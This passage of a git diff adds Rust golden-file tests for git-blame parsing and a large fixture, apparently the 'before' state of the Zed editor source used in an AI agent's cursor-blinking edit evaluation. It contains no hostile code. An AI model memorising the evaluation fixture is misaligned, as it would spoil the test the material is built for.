Is it generated?", path)) + } + + fn assert_eq_golden(entries: &Vec, golden_filename: &str) { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push("golden"); + path.push(format!("{}.json", golden_filename)); + + let mut have_json = + serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); + // We always want to save with a trailing newline. + have_json.push('\n'); + + let update = std::env::var("UPDATE_GOLDEN") + .map(|val| val.eq_ignore_ascii_case("true")) + .unwrap_or(false); + + if update { + std::fs::create_dir_all(path.parent().unwrap()) + .expect("could not create golden test data directory"); + std::fs::write(&path, have_json).expect("could not write out golden data"); + } else { + let want_json = + std::fs::read_to_string(&path).unwrap_or_else(|_| { + panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); + }).replace("\r\n", "\n"); + + pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); + } + } + + #[test] + fn test_parse_git_blame_not_committed() { + let output = read_test_data("blame_incremental_not_committed"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_not_committed"); + } + + #[test] + fn test_parse_git_blame_simple() { + let output = read_test_data("blame_incremental_simple"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_simple"); + } + + #[test] + fn test_parse_git_blame_complex() { + let output = read_test_data("blame_incremental_complex"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_complex"); + } +} diff --git a/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/before.rs b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/before.rs new file mode 100644 index 
0000000000000000000000000000000000000000..bdf160d8ffe2c605a9e995d6efe7227dce34eaab --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/before.rs @@ -0,0 +1,21343 @@ +#![allow(rustdoc::private_intra_doc_links)] +//! This is the place where everything editor-related is stored (data-wise) and displayed (ui-wise). +//! The main point of interest in this crate is [`Editor`] type, which is used in every other Zed part as a user input element. +//! It comes in different flavors: single line, multiline and a fixed height one. +//! +//! Editor contains of multiple large submodules: +//! * [`element`] — the place where all rendering happens +//! * [`display_map`] - chunks up text in the editor into the logical blocks, establishes coordinates and mapping between each of them. +//! Contains all metadata related to text transformations (folds, fake inlay text insertions, soft wraps, tab markup, etc.). +//! * [`inlay_hint_cache`] - is a storage of inlay hints out of LSP requests, responsible for querying LSP and updating `display_map`'s state accordingly. +//! +//! All other submodules and structs are mostly concerned with holding editor data about the way it displays current buffer region(s). +//! +//! If you're looking to improve Vim mode, you should check out Vim crate that wraps Editor and overrides its behavior. 
+pub mod actions; +mod blink_manager; +mod clangd_ext; +mod code_context_menus; +pub mod display_map; +mod editor_settings; +mod editor_settings_controls; +mod element; +mod git; +mod highlight_matching_bracket; +mod hover_links; +pub mod hover_popover; +mod indent_guides; +mod inlay_hint_cache; +pub mod items; +mod jsx_tag_auto_close; +mod linked_editing_ranges; +mod lsp_ext; +mod mouse_context_menu; +pub mod movement; +mod persistence; +mod proposed_changes_editor; +mod rust_analyzer_ext; +pub mod scroll; +mod selections_collection; +pub mod tasks; + +#[cfg(test)] +mod code_completion_tests; +#[cfg(test)] +mod editor_tests; +#[cfg(test)] +mod inline_completion_tests; +mod signature_help; +#[cfg(any(test, feature = "test-support"))] +pub mod test; + +pub(crate) use actions::*; +pub use actions::{AcceptEditPrediction, OpenExcerpts, OpenExcerptsSplit}; +use aho_corasick::AhoCorasick; +use anyhow::{Context as _, Result, anyhow}; +use blink_manager::BlinkManager; +use buffer_diff::DiffHunkStatus; +use client::{Collaborator, ParticipantIndex}; +use clock::ReplicaId; +use collections::{BTreeMap, HashMap, HashSet, VecDeque}; +use convert_case::{Case, Casing}; +use display_map::*; +pub use display_map::{ChunkRenderer, ChunkRendererContext, DisplayPoint, FoldPlaceholder}; +use editor_settings::GoToDefinitionFallback; +pub use editor_settings::{ + CurrentLineHighlight, EditorSettings, HideMouseMode, ScrollBeyondLastLine, SearchSettings, + ShowScrollbar, +}; +pub use editor_settings_controls::*; +use element::{AcceptEditPredictionBinding, LineWithInvisibles, PositionMap, layout_line}; +pub use element::{ + CursorLayout, EditorElement, HighlightedRange, HighlightedRangeLine, PointForPosition, +}; +use feature_flags::{DebuggerFeatureFlag, FeatureFlagAppExt}; +use futures::{ + FutureExt, + future::{self, Shared, join}, +}; +use fuzzy::StringMatchCandidate; + +use ::git::blame::BlameEntry; +use ::git::{Restore, blame::ParsedCommitMessage}; +use code_context_menus::{ + 
AvailableCodeAction, CodeActionContents, CodeActionsItem, CodeActionsMenu, CodeContextMenu, + CompletionsMenu, ContextMenuOrigin, +}; +use git::blame::{GitBlame, GlobalBlameRenderer}; +use gpui::{ + Action, Animation, AnimationExt, AnyElement, App, AppContext, AsyncWindowContext, + AvailableSpace, Background, Bounds, ClickEvent, ClipboardEntry, ClipboardItem, Context, + DispatchPhase, Edges, Entity, EntityInputHandler, EventEmitter, FocusHandle, FocusOutEvent, + Focusable, FontId, FontWeight, Global, HighlightStyle, Hsla, KeyContext, Modifiers, + MouseButton, MouseDownEvent, PaintQuad, ParentElement, Pixels, Render, ScrollHandle, + SharedString, Size, Stateful, Styled, Subscription, Task, TextStyle, TextStyleRefinement, + UTF16Selection, UnderlineStyle, UniformListScrollHandle, WeakEntity, WeakFocusHandle, Window, + div, impl_actions, point, prelude::*, pulsating_between, px, relative, size, +}; +use highlight_matching_bracket::refresh_matching_bracket_highlights; +use hover_links::{HoverLink, HoveredLinkState, InlayHighlight, find_file}; +pub use hover_popover::hover_markdown_style; +use hover_popover::{HoverState, hide_hover}; +use indent_guides::ActiveIndentGuidesState; +use inlay_hint_cache::{InlayHintCache, InlaySplice, InvalidationStrategy}; +pub use inline_completion::Direction; +use inline_completion::{EditPredictionProvider, InlineCompletionProviderHandle}; +pub use items::MAX_TAB_TITLE_LEN; +use itertools::Itertools; +use language::{ + AutoindentMode, BracketMatch, BracketPair, Buffer, Capability, CharKind, CodeLabel, + CursorShape, DiagnosticEntry, DiffOptions, EditPredictionsMode, EditPreview, HighlightedText, + IndentKind, IndentSize, Language, OffsetRangeExt, Point, Selection, SelectionGoal, TextObject, + TransactionId, TreeSitterOptions, WordsQuery, + language_settings::{ + self, InlayHintSettings, LspInsertMode, RewrapBehavior, WordsCompletionMode, + all_language_settings, language_settings, + }, + point_from_lsp, text_diff_with_options, +}; +use 
language::{BufferRow, CharClassifier, Runnable, RunnableRange, point_to_lsp}; +use linked_editing_ranges::refresh_linked_ranges; +use markdown::Markdown; +use mouse_context_menu::MouseContextMenu; +use persistence::DB; +use project::{ + ProjectPath, + debugger::{ + breakpoint_store::{ + BreakpointEditAction, BreakpointState, BreakpointStore, BreakpointStoreEvent, + }, + session::{Session, SessionEvent}, + }, +}; + +pub use git::blame::BlameRenderer; +pub use proposed_changes_editor::{ + ProposedChangeLocation, ProposedChangesEditor, ProposedChangesEditorToolbar, +}; +use smallvec::smallvec; +use std::{cell::OnceCell, iter::Peekable}; +use task::{ResolvedTask, RunnableTag, TaskTemplate, TaskVariables}; + +pub use lsp::CompletionContext; +use lsp::{ + CodeActionKind, CompletionItemKind, CompletionTriggerKind, DiagnosticSeverity, + InsertTextFormat, InsertTextMode, LanguageServerId, LanguageServerName, +}; + +use language::BufferSnapshot; +pub use lsp_ext::lsp_tasks; +use movement::TextLayoutDetails; +pub use multi_buffer::{ + Anchor, AnchorRangeExt, ExcerptId, ExcerptRange, MultiBuffer, MultiBufferSnapshot, PathKey, + RowInfo, ToOffset, ToPoint, +}; +use multi_buffer::{ + ExcerptInfo, ExpandExcerptDirection, MultiBufferDiffHunk, MultiBufferPoint, MultiBufferRow, + MultiOrSingleBufferOffsetRange, ToOffsetUtf16, +}; +use parking_lot::Mutex; +use project::{ + CodeAction, Completion, CompletionIntent, CompletionSource, DocumentHighlight, InlayHint, + Location, LocationLink, PrepareRenameResponse, Project, ProjectItem, ProjectTransaction, + TaskSourceKind, + debugger::breakpoint_store::Breakpoint, + lsp_store::{CompletionDocumentation, FormatTrigger, LspFormatTarget, OpenLspBufferHandle}, + project_settings::{GitGutterSetting, ProjectSettings}, +}; +use rand::prelude::*; +use rpc::{ErrorExt, proto::*}; +use scroll::{Autoscroll, OngoingScroll, ScrollAnchor, ScrollManager, ScrollbarAutoHide}; +use selections_collection::{ + MutableSelectionsCollection, SelectionsCollection, 
resolve_selections, +}; +use serde::{Deserialize, Serialize}; +use settings::{Settings, SettingsLocation, SettingsStore, update_settings_file}; +use smallvec::SmallVec; +use snippet::Snippet; +use std::sync::Arc; +use std::{ + any::TypeId, + borrow::Cow, + cell::RefCell, + cmp::{self, Ordering, Reverse}, + mem, + num::NonZeroU32, + ops::{ControlFlow, Deref, DerefMut, Not as _, Range, RangeInclusive}, + path::{Path, PathBuf}, + rc::Rc, + time::{Duration, Instant}, +}; +pub use sum_tree::Bias; +use sum_tree::TreeMap; +use text::{BufferId, FromAnchor, OffsetUtf16, Rope}; +use theme::{ + ActiveTheme, PlayerColor, StatusColors, SyntaxTheme, ThemeColors, ThemeSettings, + observe_buffer_font_size_adjustment, +}; +use ui::{ + ButtonSize, ButtonStyle, ContextMenu, Disclosure, IconButton, IconButtonShape, IconName, + IconSize, Key, Tooltip, h_flex, prelude::*, +}; +use util::{RangeExt, ResultExt, TryFutureExt, maybe, post_inc}; +use workspace::{ + Item as WorkspaceItem, ItemId, ItemNavHistory, OpenInTerminal, OpenTerminal, + RestoreOnStartupBehavior, SERIALIZATION_THROTTLE_TIME, SplitDirection, TabBarSettings, Toast, + ViewId, Workspace, WorkspaceId, WorkspaceSettings, + item::{ItemHandle, PreviewTabsSettings}, + notifications::{DetachAndPromptErr, NotificationId, NotifyTaskExt}, + searchable::SearchEvent, +}; + +use crate::hover_links::{find_url, find_url_from_range}; +use crate::signature_help::{SignatureHelpHiddenBy, SignatureHelpState}; + +pub const FILE_HEADER_HEIGHT: u32 = 2; +pub const MULTI_BUFFER_EXCERPT_HEADER_HEIGHT: u32 = 1; +pub const DEFAULT_MULTIBUFFER_CONTEXT: u32 = 2; +const CURSOR_BLINK_INTERVAL: Duration = Duration::from_millis(500); +const MAX_LINE_LEN: usize = 1024; +const MIN_NAVIGATION_HISTORY_ROW_DELTA: i64 = 10; +const MAX_SELECTION_HISTORY_LEN: usize = 1024; +pub(crate) const CURSORS_VISIBLE_FOR: Duration = Duration::from_millis(2000); +#[doc(hidden)] +pub const CODE_ACTIONS_DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(250); +const 
SELECTION_HIGHLIGHT_DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(100); + +pub(crate) const CODE_ACTION_TIMEOUT: Duration = Duration::from_secs(5); +pub(crate) const FORMAT_TIMEOUT: Duration = Duration::from_secs(5); +pub(crate) const SCROLL_CENTER_TOP_BOTTOM_DEBOUNCE_TIMEOUT: Duration = Duration::from_secs(1); + +pub(crate) const EDIT_PREDICTION_KEY_CONTEXT: &str = "edit_prediction"; +pub(crate) const EDIT_PREDICTION_CONFLICT_KEY_CONTEXT: &str = "edit_prediction_conflict"; +pub(crate) const MIN_LINE_NUMBER_DIGITS: u32 = 4; + +pub type RenderDiffHunkControlsFn = Arc< + dyn Fn( + u32, + &DiffHunkStatus, + Range, + bool, + Pixels, + &Entity, + &mut Window, + &mut App, + ) -> AnyElement, +>; + +const COLUMNAR_SELECTION_MODIFIERS: Modifiers = Modifiers { + alt: true, + shift: true, + control: false, + platform: false, + function: false, +}; + +struct InlineValueCache { + enabled: bool, + inlays: Vec, + refresh_task: Task>, +} + +impl InlineValueCache { + fn new(enabled: bool) -> Self { + Self { + enabled, + inlays: Vec::new(), + refresh_task: Task::ready(None), + } + } +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)] +pub enum InlayId { + InlineCompletion(usize), + Hint(usize), + DebuggerValue(usize), +} + +impl InlayId { + fn id(&self) -> usize { + match self { + Self::InlineCompletion(id) => *id, + Self::Hint(id) => *id, + Self::DebuggerValue(id) => *id, + } + } +} + +pub enum ActiveDebugLine {} +enum DocumentHighlightRead {} +enum DocumentHighlightWrite {} +enum InputComposition {} +enum SelectedTextHighlight {} + +pub enum ConflictsOuter {} +pub enum ConflictsOurs {} +pub enum ConflictsTheirs {} +pub enum ConflictsOursMarker {} +pub enum ConflictsTheirsMarker {} + +#[derive(Debug, Copy, Clone, PartialEq, Eq)] +pub enum Navigated { + Yes, + No, +} + +impl Navigated { + pub fn from_bool(yes: bool) -> Navigated { + if yes { Navigated::Yes } else { Navigated::No } + } +} + +#[derive(Debug, Clone, PartialEq, Eq)] +enum DisplayDiffHunk { + 
Folded { + display_row: DisplayRow, + }, + Unfolded { + is_created_file: bool, + diff_base_byte_range: Range, + display_row_range: Range, + multi_buffer_range: Range, + status: DiffHunkStatus, + }, +} + +pub enum HideMouseCursorOrigin { + TypingAction, + MovementAction, +} + +pub fn init_settings(cx: &mut App) { + EditorSettings::register(cx); +} + +pub fn init(cx: &mut App) { + init_settings(cx); + + cx.set_global(GlobalBlameRenderer(Arc::new(()))); + + workspace::register_project_item::(cx); + workspace::FollowableViewRegistry::register::(cx); + workspace::register_serializable_item::(cx); + + cx.observe_new( + |workspace: &mut Workspace, _: Option<&mut Window>, _cx: &mut Context| { + workspace.register_action(Editor::new_file); + workspace.register_action(Editor::new_file_vertical); + workspace.register_action(Editor::new_file_horizontal); + workspace.register_action(Editor::cancel_language_server_work); + }, + ) + .detach(); + + cx.on_action(move |_: &workspace::NewFile, cx| { + let app_state = workspace::AppState::global(cx); + if let Some(app_state) = app_state.upgrade() { + workspace::open_new( + Default::default(), + app_state, + cx, + |workspace, window, cx| { + Editor::new_file(workspace, &Default::default(), window, cx) + }, + ) + .detach(); + } + }); + cx.on_action(move |_: &workspace::NewWindow, cx| { + let app_state = workspace::AppState::global(cx); + if let Some(app_state) = app_state.upgrade() { + workspace::open_new( + Default::default(), + app_state, + cx, + |workspace, window, cx| { + cx.activate(true); + Editor::new_file(workspace, &Default::default(), window, cx) + }, + ) + .detach(); + } + }); +} + +pub fn set_blame_renderer(renderer: impl BlameRenderer + 'static, cx: &mut App) { + cx.set_global(GlobalBlameRenderer(Arc::new(renderer))); +} + +pub trait DiagnosticRenderer { + fn render_group( + &self, + diagnostic_group: Vec>, + buffer_id: BufferId, + snapshot: EditorSnapshot, + editor: WeakEntity, + cx: &mut App, + ) -> Vec>; + + fn 
render_hover( + &self, + diagnostic_group: Vec>, + range: Range, + buffer_id: BufferId, + cx: &mut App, + ) -> Option>; + + fn open_link( + &self, + editor: &mut Editor, + link: SharedString, + window: &mut Window, + cx: &mut Context, + ); +} + +pub(crate) struct GlobalDiagnosticRenderer(pub Arc); + +impl GlobalDiagnosticRenderer { + fn global(cx: &App) -> Option> { + cx.try_global::().map(|g| g.0.clone()) + } +} + +impl gpui::Global for GlobalDiagnosticRenderer {} +pub fn set_diagnostic_renderer(renderer: impl DiagnosticRenderer + 'static, cx: &mut App) { + cx.set_global(GlobalDiagnosticRenderer(Arc::new(renderer))); +} + +pub struct SearchWithinRange; + +trait InvalidationRegion { + fn ranges(&self) -> &[Range]; +} + +#[derive(Clone, Debug, PartialEq)] +pub enum SelectPhase { + Begin { + position: DisplayPoint, + add: bool, + click_count: usize, + }, + BeginColumnar { + position: DisplayPoint, + reset: bool, + goal_column: u32, + }, + Extend { + position: DisplayPoint, + click_count: usize, + }, + Update { + position: DisplayPoint, + goal_column: u32, + scroll_delta: gpui::Point, + }, + End, +} + +#[derive(Clone, Debug)] +pub enum SelectMode { + Character, + Word(Range), + Line(Range), + All, +} + +#[derive(Copy, Clone, PartialEq, Eq, Debug)] +pub enum EditorMode { + SingleLine { + auto_width: bool, + }, + AutoHeight { + max_lines: usize, + }, + Full { + /// When set to `true`, the editor will scale its UI elements with the buffer font size. + scale_ui_elements_with_buffer_font_size: bool, + /// When set to `true`, the editor will render a background for the active line. + show_active_line_background: bool, + /// When set to `true`, the editor's height will be determined by its content. 
+ sized_by_content: bool, + }, +} + +impl EditorMode { + pub fn full() -> Self { + Self::Full { + scale_ui_elements_with_buffer_font_size: true, + show_active_line_background: true, + sized_by_content: false, + } + } + + pub fn is_full(&self) -> bool { + matches!(self, Self::Full { .. }) + } +} + +#[derive(Copy, Clone, Debug)] +pub enum SoftWrap { + /// Prefer not to wrap at all. + /// + /// Note: this is currently internal, as actually limited by [`crate::MAX_LINE_LEN`] until it wraps. + /// The mode is used inside git diff hunks, where it's seems currently more useful to not wrap as much as possible. + GitDiff, + /// Prefer a single line generally, unless an overly long line is encountered. + None, + /// Soft wrap lines that exceed the editor width. + EditorWidth, + /// Soft wrap lines at the preferred line length. + Column(u32), + /// Soft wrap line at the preferred line length or the editor width (whichever is smaller). + Bounded(u32), +} + +#[derive(Clone)] +pub struct EditorStyle { + pub background: Hsla, + pub local_player: PlayerColor, + pub text: TextStyle, + pub scrollbar_width: Pixels, + pub syntax: Arc, + pub status: StatusColors, + pub inlay_hints_style: HighlightStyle, + pub inline_completion_styles: InlineCompletionStyles, + pub unnecessary_code_fade: f32, +} + +impl Default for EditorStyle { + fn default() -> Self { + Self { + background: Hsla::default(), + local_player: PlayerColor::default(), + text: TextStyle::default(), + scrollbar_width: Pixels::default(), + syntax: Default::default(), + // HACK: Status colors don't have a real default. + // We should look into removing the status colors from the editor + // style and retrieve them directly from the theme. 
+ status: StatusColors::dark(), + inlay_hints_style: HighlightStyle::default(), + inline_completion_styles: InlineCompletionStyles { + insertion: HighlightStyle::default(), + whitespace: HighlightStyle::default(), + }, + unnecessary_code_fade: Default::default(), + } + } +} + +pub fn make_inlay_hints_style(cx: &mut App) -> HighlightStyle { + let show_background = language_settings::language_settings(None, None, cx) + .inlay_hints + .show_background; + + HighlightStyle { + color: Some(cx.theme().status().hint), + background_color: show_background.then(|| cx.theme().status().hint_background), + ..HighlightStyle::default() + } +} + +pub fn make_suggestion_styles(cx: &mut App) -> InlineCompletionStyles { + InlineCompletionStyles { + insertion: HighlightStyle { + color: Some(cx.theme().status().predictive), + ..HighlightStyle::default() + }, + whitespace: HighlightStyle { + background_color: Some(cx.theme().status().created_background), + ..HighlightStyle::default() + }, + } +} + +type CompletionId = usize; + +pub(crate) enum EditDisplayMode { + TabAccept, + DiffPopover, + Inline, +} + +enum InlineCompletion { + Edit { + edits: Vec<(Range, String)>, + edit_preview: Option, + display_mode: EditDisplayMode, + snapshot: BufferSnapshot, + }, + Move { + target: Anchor, + snapshot: BufferSnapshot, + }, +} + +struct InlineCompletionState { + inlay_ids: Vec, + completion: InlineCompletion, + completion_id: Option, + invalidation_range: Range, +} + +enum EditPredictionSettings { + Disabled, + Enabled { + show_in_menu: bool, + preview_requires_modifier: bool, + }, +} + +enum InlineCompletionHighlight {} + +#[derive(Debug, Clone)] +struct InlineDiagnostic { + message: SharedString, + group_id: usize, + is_primary: bool, + start: Point, + severity: DiagnosticSeverity, +} + +pub enum MenuInlineCompletionsPolicy { + Never, + ByProvider, +} + +pub enum EditPredictionPreview { + /// Modifier is not pressed + Inactive { released_too_fast: bool }, + /// Modifier pressed + Active { + 
since: Instant, + previous_scroll_position: Option, + }, +} + +impl EditPredictionPreview { + pub fn released_too_fast(&self) -> bool { + match self { + EditPredictionPreview::Inactive { released_too_fast } => *released_too_fast, + EditPredictionPreview::Active { .. } => false, + } + } + + pub fn set_previous_scroll_position(&mut self, scroll_position: Option) { + if let EditPredictionPreview::Active { + previous_scroll_position, + .. + } = self + { + *previous_scroll_position = scroll_position; + } + } +} + +pub struct ContextMenuOptions { + pub min_entries_visible: usize, + pub max_entries_visible: usize, + pub placement: Option, +} + +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum ContextMenuPlacement { + Above, + Below, +} + +#[derive(Copy, Clone, Eq, PartialEq, PartialOrd, Ord, Debug, Default)] +struct EditorActionId(usize); + +impl EditorActionId { + pub fn post_inc(&mut self) -> Self { + let answer = self.0; + + *self = Self(answer + 1); + + Self(answer) + } +} + +// type GetFieldEditorTheme = dyn Fn(&theme::Theme) -> theme::FieldEditor; +// type OverrideTextStyle = dyn Fn(&EditorStyle) -> Option; + +type BackgroundHighlight = (fn(&ThemeColors) -> Hsla, Arc<[Range]>); +type GutterHighlight = (fn(&App) -> Hsla, Arc<[Range]>); + +#[derive(Default)] +struct ScrollbarMarkerState { + scrollbar_size: Size, + dirty: bool, + markers: Arc<[PaintQuad]>, + pending_refresh: Option>>, +} + +impl ScrollbarMarkerState { + fn should_refresh(&self, scrollbar_size: Size) -> bool { + self.pending_refresh.is_none() && (self.scrollbar_size != scrollbar_size || self.dirty) + } +} + +#[derive(Clone, Debug)] +struct RunnableTasks { + templates: Vec<(TaskSourceKind, TaskTemplate)>, + offset: multi_buffer::Anchor, + // We need the column at which the task context evaluation should take place (when we're spawning it via gutter). + column: u32, + // Values of all named captures, including those starting with '_' + extra_variables: HashMap, + // Full range of the tagged region. 
We use it to determine which `extra_variables` to grab for context resolution in e.g. a modal. + context_range: Range, +} + +impl RunnableTasks { + fn resolve<'a>( + &'a self, + cx: &'a task::TaskContext, + ) -> impl Iterator + 'a { + self.templates.iter().filter_map(|(kind, template)| { + template + .resolve_task(&kind.to_id_base(), cx) + .map(|task| (kind.clone(), task)) + }) + } +} + +#[derive(Clone)] +struct ResolvedTasks { + templates: SmallVec<[(TaskSourceKind, ResolvedTask); 1]>, + position: Anchor, +} + +#[derive(Copy, Clone, Debug, PartialEq, PartialOrd)] +struct BufferOffset(usize); + +// Addons allow storing per-editor state in other crates (e.g. Vim) +pub trait Addon: 'static { + fn extend_key_context(&self, _: &mut KeyContext, _: &App) {} + + fn render_buffer_header_controls( + &self, + _: &ExcerptInfo, + _: &Window, + _: &App, + ) -> Option { + None + } + + fn to_any(&self) -> &dyn std::any::Any; + + fn to_any_mut(&mut self) -> Option<&mut dyn std::any::Any> { + None + } +} + +/// A set of caret positions, registered when the editor was edited. +pub struct ChangeList { + changes: Vec>, + /// Currently "selected" change. + position: Option, +} + +impl ChangeList { + pub fn new() -> Self { + Self { + changes: Vec::new(), + position: None, + } + } + + /// Moves to the next change in the list (based on the direction given) and returns the caret positions for the next change. + /// If reaches the end of the list in the direction, returns the corresponding change until called for a different direction. 
+ pub fn next_change(&mut self, count: usize, direction: Direction) -> Option<&[Anchor]> { + if self.changes.is_empty() { + return None; + } + + let prev = self.position.unwrap_or(self.changes.len()); + let next = if direction == Direction::Prev { + prev.saturating_sub(count) + } else { + (prev + count).min(self.changes.len() - 1) + }; + self.position = Some(next); + self.changes.get(next).map(|anchors| anchors.as_slice()) + } + + /// Adds a new change to the list, resetting the change list position. + pub fn push_to_change_list(&mut self, pop_state: bool, new_positions: Vec) { + self.position.take(); + if pop_state { + self.changes.pop(); + } + self.changes.push(new_positions.clone()); + } + + pub fn last(&self) -> Option<&[Anchor]> { + self.changes.last().map(|anchors| anchors.as_slice()) + } +} + +#[derive(Clone)] +struct InlineBlamePopoverState { + scroll_handle: ScrollHandle, + commit_message: Option, + markdown: Entity, +} + +struct InlineBlamePopover { + position: gpui::Point, + show_task: Option>, + hide_task: Option>, + popover_bounds: Option>, + popover_state: InlineBlamePopoverState, +} + +/// Represents a breakpoint indicator that shows up when hovering over lines in the gutter that don't have +/// a breakpoint on them. +#[derive(Clone, Copy, Debug)] +struct PhantomBreakpointIndicator { + display_row: DisplayRow, + /// There's a small debounce between hovering over the line and showing the indicator. + /// We don't want to show the indicator when moving the mouse from editor to e.g. project panel. + is_active: bool, + collides_with_existing_breakpoint: bool, +} +/// Zed's primary implementation of text input, allowing users to edit a [`MultiBuffer`]. +/// +/// See the [module level documentation](self) for more information. +pub struct Editor { + focus_handle: FocusHandle, + last_focused_descendant: Option, + /// The text buffer being edited + buffer: Entity, + /// Map of how text in the buffer should be displayed. 
+ /// Handles soft wraps, folds, fake inlay text insertions, etc. + pub display_map: Entity, + pub selections: SelectionsCollection, + pub scroll_manager: ScrollManager, + /// When inline assist editors are linked, they all render cursors because + /// typing enters text into each of them, even the ones that aren't focused. + pub(crate) show_cursor_when_unfocused: bool, + columnar_selection_tail: Option, + add_selections_state: Option, + select_next_state: Option, + select_prev_state: Option, + selection_history: SelectionHistory, + autoclose_regions: Vec, + snippet_stack: InvalidationStack, + select_syntax_node_history: SelectSyntaxNodeHistory, + ime_transaction: Option, + active_diagnostics: ActiveDiagnostic, + show_inline_diagnostics: bool, + inline_diagnostics_update: Task<()>, + inline_diagnostics_enabled: bool, + inline_diagnostics: Vec<(Anchor, InlineDiagnostic)>, + soft_wrap_mode_override: Option, + hard_wrap: Option, + + // TODO: make this a access method + pub project: Option>, + semantics_provider: Option>, + completion_provider: Option>, + collaboration_hub: Option>, + blink_manager: Entity, + show_cursor_names: bool, + hovered_cursors: HashMap>, + pub show_local_selections: bool, + mode: EditorMode, + show_breadcrumbs: bool, + show_gutter: bool, + show_scrollbars: bool, + disable_scrolling: bool, + disable_expand_excerpt_buttons: bool, + show_line_numbers: Option, + use_relative_line_numbers: Option, + show_git_diff_gutter: Option, + show_code_actions: Option, + show_runnables: Option, + show_breakpoints: Option, + show_wrap_guides: Option, + show_indent_guides: Option, + placeholder_text: Option>, + highlight_order: usize, + highlighted_rows: HashMap>, + background_highlights: TreeMap, + gutter_highlights: TreeMap, + scrollbar_marker_state: ScrollbarMarkerState, + active_indent_guides_state: ActiveIndentGuidesState, + nav_history: Option, + context_menu: RefCell>, + context_menu_options: Option, + mouse_context_menu: Option, + completion_tasks: 
Vec<(CompletionId, Task>)>, + inline_blame_popover: Option, + signature_help_state: SignatureHelpState, + auto_signature_help: Option, + find_all_references_task_sources: Vec, + next_completion_id: CompletionId, + available_code_actions: Option<(Location, Rc<[AvailableCodeAction]>)>, + code_actions_task: Option>>, + quick_selection_highlight_task: Option<(Range, Task<()>)>, + debounced_selection_highlight_task: Option<(Range, Task<()>)>, + document_highlights_task: Option>, + linked_editing_range_task: Option>>, + linked_edit_ranges: linked_editing_ranges::LinkedEditingRanges, + pending_rename: Option, + searchable: bool, + cursor_shape: CursorShape, + current_line_highlight: Option, + collapse_matches: bool, + autoindent_mode: Option, + workspace: Option<(WeakEntity, Option)>, + input_enabled: bool, + use_modal_editing: bool, + read_only: bool, + leader_peer_id: Option, + remote_id: Option, + pub hover_state: HoverState, + pending_mouse_down: Option>>>, + gutter_hovered: bool, + hovered_link_state: Option, + edit_prediction_provider: Option, + code_action_providers: Vec>, + active_inline_completion: Option, + /// Used to prevent flickering as the user types while the menu is open + stale_inline_completion_in_menu: Option, + edit_prediction_settings: EditPredictionSettings, + inline_completions_hidden_for_vim_mode: bool, + show_inline_completions_override: Option, + menu_inline_completions_policy: MenuInlineCompletionsPolicy, + edit_prediction_preview: EditPredictionPreview, + edit_prediction_indent_conflict: bool, + edit_prediction_requires_modifier_in_indent_conflict: bool, + inlay_hint_cache: InlayHintCache, + next_inlay_id: usize, + _subscriptions: Vec, + pixel_position_of_newest_cursor: Option>, + gutter_dimensions: GutterDimensions, + style: Option, + text_style_refinement: Option, + next_editor_action_id: EditorActionId, + editor_actions: + Rc)>>>>, + use_autoclose: bool, + use_auto_surround: bool, + auto_replace_emoji_shortcode: bool, + 
jsx_tag_auto_close_enabled_in_any_buffer: bool, + show_git_blame_gutter: bool, + show_git_blame_inline: bool, + show_git_blame_inline_delay_task: Option>, + git_blame_inline_enabled: bool, + render_diff_hunk_controls: RenderDiffHunkControlsFn, + serialize_dirty_buffers: bool, + show_selection_menu: Option, + blame: Option>, + blame_subscription: Option, + custom_context_menu: Option< + Box< + dyn 'static + + Fn( + &mut Self, + DisplayPoint, + &mut Window, + &mut Context, + ) -> Option>, + >, + >, + last_bounds: Option>, + last_position_map: Option>, + expect_bounds_change: Option>, + tasks: BTreeMap<(BufferId, BufferRow), RunnableTasks>, + tasks_update_task: Option>, + breakpoint_store: Option>, + gutter_breakpoint_indicator: (Option, Option>), + in_project_search: bool, + previous_search_ranges: Option]>>, + breadcrumb_header: Option, + focused_block: Option, + next_scroll_position: NextScrollCursorCenterTopBottom, + addons: HashMap>, + registered_buffers: HashMap, + load_diff_task: Option>>, + selection_mark_mode: bool, + toggle_fold_multiple_buffers: Task<()>, + _scroll_cursor_center_top_bottom_task: Task<()>, + serialize_selections: Task<()>, + serialize_folds: Task<()>, + mouse_cursor_hidden: bool, + hide_mouse_mode: HideMouseMode, + pub change_list: ChangeList, + inline_value_cache: InlineValueCache, +} + +#[derive(Copy, Clone, Debug, PartialEq, Eq, Default)] +enum NextScrollCursorCenterTopBottom { + #[default] + Center, + Top, + Bottom, +} + +impl NextScrollCursorCenterTopBottom { + fn next(&self) -> Self { + match self { + Self::Center => Self::Top, + Self::Top => Self::Bottom, + Self::Bottom => Self::Center, + } + } +} + +#[derive(Clone)] +pub struct EditorSnapshot { + pub mode: EditorMode, + show_gutter: bool, + show_line_numbers: Option, + show_git_diff_gutter: Option, + show_code_actions: Option, + show_runnables: Option, + show_breakpoints: Option, + git_blame_gutter_max_author_length: Option, + pub display_snapshot: DisplaySnapshot, + pub 
